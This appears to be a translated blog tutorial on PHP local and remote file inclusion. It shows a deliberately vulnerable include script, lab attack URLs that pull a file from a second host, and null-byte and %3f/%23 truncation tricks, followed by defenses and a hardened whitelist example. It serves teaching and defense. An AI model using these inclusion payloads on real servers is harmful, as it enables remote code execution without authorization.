File Inclusion Vulnerabilities (II)
2022-07-02 05:45:00 【A τθ】
I. Remote file inclusion
1. Principle analysis
When remote file access is enabled, PHP can include a remote file and execute it locally. Remote inclusion is allowed when both conditions, allow_url_fopen=On and allow_url_include=On, are set to On at the same time.
2. Practice
2.1 Create test.php on the virtual machine
<?php
include $_GET['file'];
?>


2.2 Set up a simple local server with Python
<?php
phpinfo();
?>
C:\Users\Administrator

2.3 Remote file inclusion
http://192.168.127.132/test.php?file=http://192.168.1.107:8089/1.txt

II. File inclusion truncation attack
In PHP versions below 5.3.4, %00 can be used for truncation: when include and the other file inclusion functions are used, the file name can be truncated.
Truncation is affected by gpc. If gpc is On, %00 is converted into \0 and truncation fails.
<?php
include $_GET['file'].'.php';
?>
The file name passed in through file is concatenated with .php and the result is pulled in with include. Because the file parameter is controllable, this causes a vulnerability.
1. File inclusion with %00 truncation
Upload a file containing malicious code to the website directory, include it, and then apply 00 truncation.
The current test version is PHP 5.2.17, gpc=off.

http://192.168.127.132/test.php?file=1.jpg%00

2. Remote inclusion truncation
2.1 Principle analysis
The characters suitable for remote truncation are:
| Symbol | URL code |
|---|---|
| # | %23 |
| ? | %3f |
| 00 | %00 |
All of the above characters can be used for truncation, with these settings:
allow_url_fopen=On
allow_url_include=On
2.2 Environment setup
<?php
include $_GET['file'];
?>


2.3 Set up a simple local server with Python
<?php
phpinfo();
?>
C:\Users\Administrator

2.4 Remote file inclusion
http://192.168.127.132/test.php?file=http://192.168.1.107:8089/1.txt%00

http://192.168.127.132/test.php?file=http://192.168.1.107:8089/1.txt%3f

http://192.168.127.132/test.php?file=http://192.168.1.107:8089/1.txt%23

III. Defense plan
1. Strictly check whether the inclusion parameter is externally controllable, because successful exploitation of a file inclusion vulnerability depends on whether the included file can be controlled externally;
2. Path restrictions: restrict inclusion to only one file, and be sure to prohibit directory traversal characters such as "../";
3. Included-file validation: verify that the included file is a member of the whitelist;
4. Avoid dynamic inclusion where possible; the file to include can be fixed in the page, for example: include('head.php');
5. Set allow_url_include to Off.
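Defense items 2 to 4 applied to the test.php shown earlier, as an added example that is not code from the original post. The PAGES map, the pages/ directory and the resolve_page() helper are assumptions made for illustration.

```php
<?php
// Added example: hardened replacement for `include $_GET['file'];`.
// PAGES, pages/ and resolve_page() are hypothetical names.

// Whitelist: request key => fixed file name. User input is only ever
// used as a lookup key and never becomes part of the path.
const PAGES = [
    'home'  => 'home.php',
    'about' => 'about.php',
];

// Return the absolute path for a whitelisted key, or null if rejected.
function resolve_page($key, $baseDir)
{
    // Reject arrays (file[]=x) and anything that is not an exact key.
    // This also rejects "../", URL schemes and %00 / %3f / %23 suffixes.
    if (!is_string($key) || !array_key_exists($key, PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$key]);
    // The file must exist and, after symlink resolution, still live
    // inside the base directory.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Constructed inputs modelled on the request shapes shown on this page
// (already URL-decoded, as PHP would see them in $_GET).
$samples = [
    'home',
    "1.jpg\0",
    '../1.jpg',
    'http://192.168.1.107:8089/1.txt?',
];
foreach ($samples as $s) {
    $p = resolve_page($s, __DIR__ . '/pages');
    echo json_encode($s), ' => ', $p === null ? 'rejected' : $p, "\n";
}

// Use in the page itself:
//   $p = resolve_page(isset($_GET['file']) ? $_GET['file'] : 'home',
//                     __DIR__ . '/pages');
//   if ($p === null) { header('HTTP/1.1 404 Not Found'); exit; }
//   include $p;
```

If pages/home.php does not exist next to the script, the 'home' sample is reported as rejected as well, because realpath() fails for missing files.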